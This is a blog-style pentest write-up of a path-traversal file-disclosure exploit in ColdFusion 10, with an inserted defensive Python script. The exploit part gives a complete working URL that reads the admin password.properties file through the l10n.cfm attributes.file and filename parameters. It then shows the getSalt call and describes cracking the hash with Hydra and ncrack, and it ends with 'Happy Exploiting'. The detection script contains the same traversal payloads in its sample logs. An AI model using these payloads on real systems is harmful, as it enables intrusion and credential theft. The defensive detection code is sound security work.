ColdFusion has had several exploits in the past.
With ColdFusion 10 being the latest stable release from Adobe, it was hard to
find any ready exploits.
As part of an external pentest, I
had no information about the infrastructure in use, the platform or the installed
applications. I ran Nessus as the first part of the network pentest and found that a ColdFusion
admin login page exists here:
http://XX.XX.XX.XX/CFIDE/administrator/index.cfm
The next step is to
get the version number. I got this by social engineering techniques. :)
Interestingly, ColdFusion 10 no longer
displays its version number on the homepage, unlike previous
versions. You need to assume it or obtain it by other means.
The Exploit
The exploit works if ColdFusion has not been
updated with the latest patches and hotfixes and is just a raw installation. The
Remote File Disclosure (RFD) allows access to operating system files,
configuration files and logs, browsing of complete server folders, and the CF admin
password hash.
The vulnerability exists in the l10n.cfm module,
as the attributes.file parameter has no validation against path traversal. This
is pretty basic; how could Adobe miss this!!!
Vulnerable URL:
http://XX.XX.XX.XX/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../coldfusion10/cfusion/lib/password.properties
Notes for successful exploits:
- You would need a couple of ../../ before you get to the password hash
- You would need to guess the ColdFusion home directory name
- You might need some knowledge of the ColdFusion folder structure. Refer to it here.
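As an added example (not code from the original post or from Adobe), the script below shows the path-confinement check the post says l10n.cfm lacks for attributes.file, and runs the same check over constructed access-log lines to flag requests whose attributes.file or filename parameters escape the customtags directory. The base directory, the CLF-style log format and the client addresses are assumptions made for the example; the check resolves ../ sequences, backslashes and repeated percent-encoding before deciding.

```python
"""Path-confinement check and access-log detection for traversal attempts
against /CFIDE/adminapi/customtags/l10n.cfm (added example, constructed data)."""
from posixpath import normpath
from urllib.parse import parse_qs, unquote, urlsplit

# Query parameters the post identifies as carrying a file path
PATH_PARAMS = ("attributes.file", "filename")

# Assumed directory that a relative attributes.file should stay inside
ALLOWED_BASE = "/CFIDE/adminapi/customtags"

# Constructed access-log lines (not real traffic); line 1 mirrors the post's URL shape
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jan/2013:12:00:01 +0000] "GET /CFIDE/adminapi/customtags/l10n.cfm'
    '?attributes.id=it&attributes.file=../../administrator/mail/download.cfm'
    '&filename=../../../../coldfusion10/cfusion/lib/password.properties HTTP/1.1" 200 1234',
    '198.51.100.8 - - [10/Jan/2013:12:00:02 +0000] "GET /CFIDE/adminapi/customtags/l10n.cfm'
    '?attributes.id=it&attributes.file=%2e%2e%2f%2e%2e%2fadministrator HTTP/1.1" 200 10',
    '203.0.113.5 - - [10/Jan/2013:12:00:03 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5000',
    '203.0.113.6 - - [10/Jan/2013:12:00:04 +0000] "GET /CFIDE/adminapi/customtags/l10n.cfm'
    '?attributes.file=messages/it.cfm HTTP/1.1" 200 99',
]


def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so %2e%2e%2f and %252e%252e%252f are both caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_confined(base, relative):
    """True if base/relative resolves inside base: the validation the post says is missing."""
    relative = decode_fully(relative).replace("\\", "/")
    if relative.startswith("/"):
        return False  # absolute paths are never acceptable here
    resolved = normpath(base + "/" + relative)
    return resolved == base or resolved.startswith(base + "/")


def traversal_params(request_target):
    """Return (param, value) pairs in an l10n.cfm request that escape ALLOWED_BASE."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/cfide/adminapi/customtags/l10n.cfm"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name in PATH_PARAMS:
        for value in query.get(name, []):
            if not is_confined(ALLOWED_BASE, value):
                findings.append((name, value))
    return findings


def scan_access_log(lines):
    """Return (client_ip, param, value) for every suspicious request in CLF-style lines."""
    hits = []
    for line in lines:
        try:
            client_ip = line.split(" ", 1)[0]
            target = line.split('"', 2)[1].split(" ")[1]  # "GET <target> HTTP/1.1"
        except IndexError:
            continue  # malformed line, skip it
        for name, value in traversal_params(target):
            hits.append((client_ip, name, value))
    return hits


if __name__ == "__main__":
    for client_ip, name, value in scan_access_log(SAMPLE_LOG):
        print(f"{client_ip} traversal via {name}={value}")
```

Feeding real logs into scan_access_log gives a quick triage of whether this URL was ever hit; the same is_confined logic is what a patched handler should apply before opening any file named by a request parameter.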
Once you have access to the password hash, the next
step is to get the salt so you can perform rainbow table attacks.
Here's a quick reference on CF sensitive files. You might want to access them too.
Password Hash URL:
http://XX.XX.XX.XX/CFIDE/adminapi/administrator.cfc?method=getSalt
Having all this information, you may now
want to proceed with password cracking. I used ncrack and Hydra for password
cracking and it worked pretty quickly, as the admin password was among the common
passwords.
Happy Exploiting CF 10!!!